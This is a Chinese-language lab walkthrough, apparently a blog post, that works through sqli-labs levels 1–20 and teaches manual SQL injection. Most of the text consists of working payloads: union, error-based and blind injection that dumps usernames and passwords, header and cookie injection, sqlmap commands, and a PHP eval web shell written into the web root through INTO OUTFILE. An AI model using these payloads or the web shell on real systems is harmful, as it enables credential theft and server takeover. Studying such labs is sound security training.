看前导读:由于篇幅原因我这里先做初级部分内容,太长没人看的下去估计。里面的payload有大量重复的,练习的人不要复制黏贴,自己多敲几遍熟练一下,盲注部分可以敲一下错误代码,对比结果。还有如果你想要更多的payload可以用百度,或者火狐插件hackbar里面都有,这里就不多赘述了。另外如有错误请你大方指出,有其他更好的解法也可以在评论区讨论。希望读者能从我的文章学到手工注入的原理,我也是踩了好多坑,练习时手工为主适当结合工具一起探测,要学会查看源码进行代码分析。
less-1 GET字符型注入(错误注入)
闭合测试:
?id=1\payload:
1' order by 3--+获取表payload:
0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+获取字段payload:
0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+获取记录payload:
0' union select 1,group_concat(username,0x3a,password),3 from users --+less-2 GET数字型注入(错误注入)
闭合测试:
?id=1\payload:
0 union select 1,user(),database() --+less-3 GET单引号括号注入(错误注入)
闭合测试:
?id=1\payload:
?id=1') --+less-4 GET双引号括号注入(错误注入)
闭合测试:
?id=1\payload:
?id=1") --+less-5 GET单引号注入(盲注/从报错中获取信息)
闭合测试:
?id=1\payload:
?id=1' --+获取库payload:
?id=0' union select 1,2,3 from (select count(*),concat((select concat(version,':',database(),':',user(),':') limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+获取表payload:
?id=0' union select 1,2,3 from (select count(*),concat((select concat(table_name,':') from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+获取用户信息payload:
?id=0' union select 1,2,3 from (select count(*),concat((select concat(id,':',username,':',password,':') from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+less-6 GET双引号注入(盲注/从报错中获取信息)
闭合测试:
?id=1\payload:
?id=1" --+获取库payload:
id=0" union select 1,2,3 from (select count(*),concat((select concat(version,':',database(),':',user(),':') limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+获取表payload:
?id=0" union select 1,2,3 from (select count(*),concat((select concat(table_name,':') from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+获取用户信息payload:
?id=0" union select 1,2,3 from (select count(*),concat((select concat(id,':',username,':',password,':') from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+less-7 GET单引号注入(盲注/读写文件)
闭合测试:
?id=0')) or 1=1 --+|0")) or 1=1 --+payload:
?id=0')) --+读取payload:
?id=0')) union select 1,load_file("D:\\bch.txt"),3 --+写入payload:
?id=0')) union select 1,"<?php @eval($_POST[cmd]); ?>",3 into outfile "D:\\phpStudy\\PHPTutorial\\WWW\\sqli\\Less-7\\shell.php" --+less-8 GET单引号注入(布尔盲注)
闭合测试:
?id=0' or 1=1 --+|0" or 1=1 --+payload:
?id=1' and length(database())=8 --+ ?id=1' and ascii(substr(database(),1,1))=115 --+less-9 GET单引号注入(时间盲注)
闭合测试:
?id=0' or if(1=1,sleep(3),null) --+|0" or if(1=1,sleep(3),null) --+payload:
?id=0' or if(ascii(substr(database(),1,1))=115,sleep(3),null) --+ ?id=0' or if(length(database())=8,sleep(3),null) --+less-10 GET双引号注入(时间盲注)
闭合测试:
?id=0' or if(1=1,sleep(3),null) --+|0" or if(1=1,sleep(3),null) --+payload:
?id=0" or if(ascii(substr(database(),1,1))=115,sleep(3),null) --+ ?id=0" or if(length(database())=8,sleep(3),null) --+less-11 POST单引号注入(错误注入)
闭合测试:
uname=1\payload:
uname=0' order by 2 --+ uanme=0' union select user(),database() --+ uname=0' or 1=1 --+less-12 POST双引号括号注入(错误注入)
闭合测试:
uname=1\payload:
uname=0") order by 2 --+ uname=0") union select user(),database() --+ uname=0") or 1=1 --+less13 POST单引号括号注入(盲注/从报错中获取信息)
闭合测试:
uname=1\payload:
uname=1') --+获取库payload:
uname=0') union select 1,2,3 from (select count(*),concat((select concat(version,':',database(),':',user(),':') limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+获取表payload:
uname0') union select 1,2,3 from (select count(*),concat((select concat(table_name,':') from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+获取用户信息payload:
uname=0') union select 1,2,3 from (select count(*),concat((select concat(id,':',username,':',password,':') from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+less-14 POST双引号注入(盲注/从报错中获取信息)
闭合测试:
uname=1\payload:
uname=1" --+获取库payload:
uname=0" union select 1,2,3 from (select count(*),concat((select concat(version,':',database(),':',user(),':') limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+获取表payload:
uname=0" union select 1,2,3 from (select count(*),concat((select concat(table_name,':') from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+获取用户信息payload:
uname=0" union select 1,2,3 from (select count(*),concat((select concat(id,':',username,':',password,':') from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+less-15 POST单引号注入(时间盲注,对错一致)
闭合测试:
uname=0' or if(1=1,sleep(3),null) --+|0" or if(1=1,sleep(3),null) --+payload:
uname=0' or if(ascii(substr(database(),1,1))=115,sleep(3),null) --+ uname=0' or if(length(database())=8,sleep(3),null) --+less-16 POST双引号括号注入(时间盲注,布尔盲注,对错不一致)
闭合测试:
uname=0') or 1=1 --+ uname=0") or 1=1 --+payload:
uname=0") or ascii(substr(database(),1,1))=115 --+ uname=0") or length(database())=8 --+ sqlmap -r target.txt --batch --level=2 //这个时间盲注漏洞只有在 level >= 2 时才可被探测到less-17 POST uname设置过滤(passwd注入)
闭合测试:
uname=admin&passwd=0' or if(1=1,sleep(3),null) --+ uname=admin&passwd=0" or if(1=1,sleep(3),null) --+因为存在注入的sql语句为:
update users set passwd='admin' where uname='admin';由代码分析可知触发条件是SQL查询结果不为空, 即
SELECT username, password FROM users WHERE username= $uname LIMIT 0,1查询结果不为空,即输入的unam='admin’必须正确
payload:
uname=admin&passwd=0' or '1'='1 uname=admin&passwd=0' and updatexml(1,concat(0x7e,concat((select database()),':',(select user()),':',(select @@version)),0x7e),1) or '1'='1 uname=admin&passwd=0' and extractvalue(1,concat(0x7e,concat((select database()),':',(select user()),':',(select @@version)),0x7e)) or '1'='1注:在update,insert等sql语句中构造sql语句,不能用- -+把后面全部注释,应该用or ‘1’='1把后面闭合(不过这个update可以用- -+,代价是全部用户密码变0)
sqlmap -r target.txt -p passwd --batchless-18 POST uname和passwd设置过滤(User-Agent注入)
闭合测试:
User-Agent:参数\存在注入的sql语句为:
INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)"由代码分析可知触发条件是SQL查询结果不为空, 即
SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1结果不为空,即输入的uname=‘admin’,passwd='0’必须正确
注:此处密码为0是由less-17注入代码执行造成的,可以根据自己的密码操作
payload:
User-Agent:参数' or '1'='1 User-Agent:参数' and updatexml(1,concat(0x7e,concat((select database()),':',(select user()),':',(select @@version)),0x7e),1) or '1'='1 User-Agent:参数' and extractvalue(1,concat(0x7e,concat((select database()),':',(select user()),':',(select @@version)),0x7e)) or '1'='1 sqlmap -r target.txt --batch //需要 User-Agent:参数* 指定参数,或者level=3及以上less-19 POST uname和passwd设置过滤(Referer注入)
闭合测试:
Referer:网站源地址\分析同上,输入的uname=‘admin’,passwd='0’必须正确
payload:
Referer:网站源地址' or '1'='1 Referer:网站源地址' and updatexml(1,concat(0x7e,concat((select database()),':',(select user()),':',(select @@version)),0x7e),1) or '1'='1 Referer:网站源地址' and extractvalue(1,concat(0x7e,concat((select database()),':',(select user()),':',(select @@version)),0x7e)) or '1'='1 sqlmap -r target.txt --batch //需要 Referer:网站源地址* 指定参数,或者level=3及以上less-20 uname和passwd设置过滤(Cookie注入)
闭合测试:
Cookie:uname=admin\首先需要登入进去才会有Cookie,所以必须输入正确的uname=‘admin’,passwd='0’以登入,然后刷新页面既可截获Cookie 其中存在注入的语句为:
SELECT * FROM users WHERE username='$cookee' LIMIT 0,1由代码分析可知触发条件是用户登入并(POST)提交(submit),即登入后既可执行该存在注入的sql语句,所以登入后再刷新页面截获Cookie并进行注入既可
payload:
Cookie:uname=admin' or '1'='1 Cookie:uname=admin' and updatexml(1,concat(0x7e,concat((select database()),':',(select user()),':',(select @@version)),0x7e),1) or '1'='1 Cookie:uname=admin' and extractvalue(1,concat(0x7e,concat((select database()),':',(select user()),':',(select @@version)),0x7e)) or '1'='1注:这里用“- -+注释”或者“or ‘1’='1闭合”都可以,存在注入的sql语句是select语句
sqlmap -r target.txt --batch更新待续。。。
